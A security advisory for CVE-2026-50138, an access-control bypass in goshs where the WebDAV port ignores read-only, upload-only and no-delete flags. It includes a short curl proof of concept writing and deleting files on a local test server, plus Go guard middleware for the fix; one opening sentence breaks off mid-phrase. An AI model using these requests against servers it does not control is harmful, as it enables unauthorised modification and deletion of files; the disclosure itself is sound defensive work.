CVE-2026-50138: goshs WebDAV Mode-Flag Access Control Bypass
When goshs is started with WebDAV enabled, the --read-only, --upload-only, and --no-delete restriction flags are silently ignored on the WebDAV port, letting any authenticated client write, delete, or
The problem
goshs wires its WebDAV port directly to golang.org/x/net/webdav.Handler with no mode-flag middleware. The HTTP mux (server.go lines 134-204) checks fs.ReadOnly, fs.UploadOnly, and fs.NoDelete on every state-changing route, but the WebDAV mux (lines 207-238) skips all three checks entirely.
Any client with valid credentials, or no credentials when auth is disabled, can send PUT, DELETE, MKCOL, MOVE, and COPY to the WebDAV port regardless of the flags the operator passed at startup. The --upload-only flag is also bypassed in reverse: GET and PROPFIND still return file contents when they should be blocked.
Proof of concept
A working proof-of-concept for CVE-2026-50138 in goshs.de/goshs/v2, with the exact payload below.
# Start goshs with read-only mode AND WebDAV enabled
mkdir -p /tmp/r && echo secret > /tmp/r/x.txt
goshs -p 18000 -wp 18001 -w -ro -d /tmp/r -b admin:pw &
# HTTP port correctly enforces -ro
curl -u admin:pw -X PUT http://localhost:18000/y.txt --data x # 403
# WebDAV port ignores -ro completely
curl -u admin:pw -X PUT http://localhost:18001/y.txt --data x # 201 CREATED
curl -u admin:pw -X DELETE http://localhost:18001/x.txt # 204 NO CONTENT
curl -u admin:pw -X MKCOL http://localhost:18001/pwned/ # 201 CREATED
The root cause is a missing enforcement layer in the WebDAV server setup. The fix in v2.1.0 inserts a wdGuard http.HandlerFunc in front of wdHandler that maps each WebDAV verb to the correct flag: PUT/MKCOL/MOVE/COPY are blocked when fs.ReadOnly or fs.UploadOnly is set, DELETE is blocked when fs.ReadOnly, fs.UploadOnly, or fs.NoDelete is set, and GET/PROPFIND/HEAD are blocked when fs.UploadOnly is set.
Because golang.org/x/net/webdav.Handler accepts every standard WebDAV method unconditionally, any gap in the wrapping middleware layer is a direct bypass. CWE-284 (Improper Access Control) applies: the capability existed but the policy was never applied to the second listener.
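The verb-to-flag mapping described above, written as an added Go example (not goshs's own code). The names Flags, blocked, guard and status are hypothetical, and a stub handler stands in for webdav.Handler. Always allowing OPTIONS, and refusing methods the advisory does not list (PROPPATCH, LOCK, UNLOCK) while any flag is set, are this example's assumptions.

```go
package main

import (
	"fmt"
	"net/http"
	"net/http/httptest"
)

// Flags holds the three restriction flags named in the advisory (hypothetical type).
type Flags struct{ ReadOnly, UploadOnly, NoDelete bool }

// blocked applies the advisory's verb-to-flag mapping to one request method.
func blocked(f Flags, method string) bool {
	switch method {
	case "OPTIONS":
		return false
	case "GET", "HEAD", "PROPFIND":
		return f.UploadOnly
	case "PUT", "MKCOL", "MOVE", "COPY":
		return f.ReadOnly || f.UploadOnly
	case "DELETE":
		return f.ReadOnly || f.UploadOnly || f.NoDelete
	}
	// Assumption: methods the advisory does not list fail closed under any restriction.
	return f.ReadOnly || f.UploadOnly || f.NoDelete
}

// guard wraps next so the policy runs before the WebDAV handler sees the request.
func guard(f Flags, next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		if blocked(f, r.Method) {
			http.Error(w, "forbidden by server mode", http.StatusForbidden)
			return
		}
		next.ServeHTTP(w, r)
	})
}

// status sends one request through the guarded stub and returns the response code.
func status(f Flags, method string) int {
	stub := http.HandlerFunc(func(w http.ResponseWriter, _ *http.Request) { w.WriteHeader(http.StatusCreated) })
	rec := httptest.NewRecorder()
	guard(f, stub).ServeHTTP(rec, httptest.NewRequest(method, "/y.txt", nil))
	return rec.Code
}

func main() {
	fmt.Println(status(Flags{ReadOnly: true}, "PUT"), status(Flags{}, "PUT")) // 403 201
}
```

A table-driven test over every flag and method combination, run against both listeners, is the regression check that catches a second handler being mounted without the guard.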
The fix
Upgrade to goshs v2.1.0. The release adds a per-verb guard middleware wrapping the WebDAV handler that enforces the same --read-only, --upload-only, and --no-delete semantics already present on the HTTP port. No configuration change is needed after upgrading.
Reported by Nishant Verma.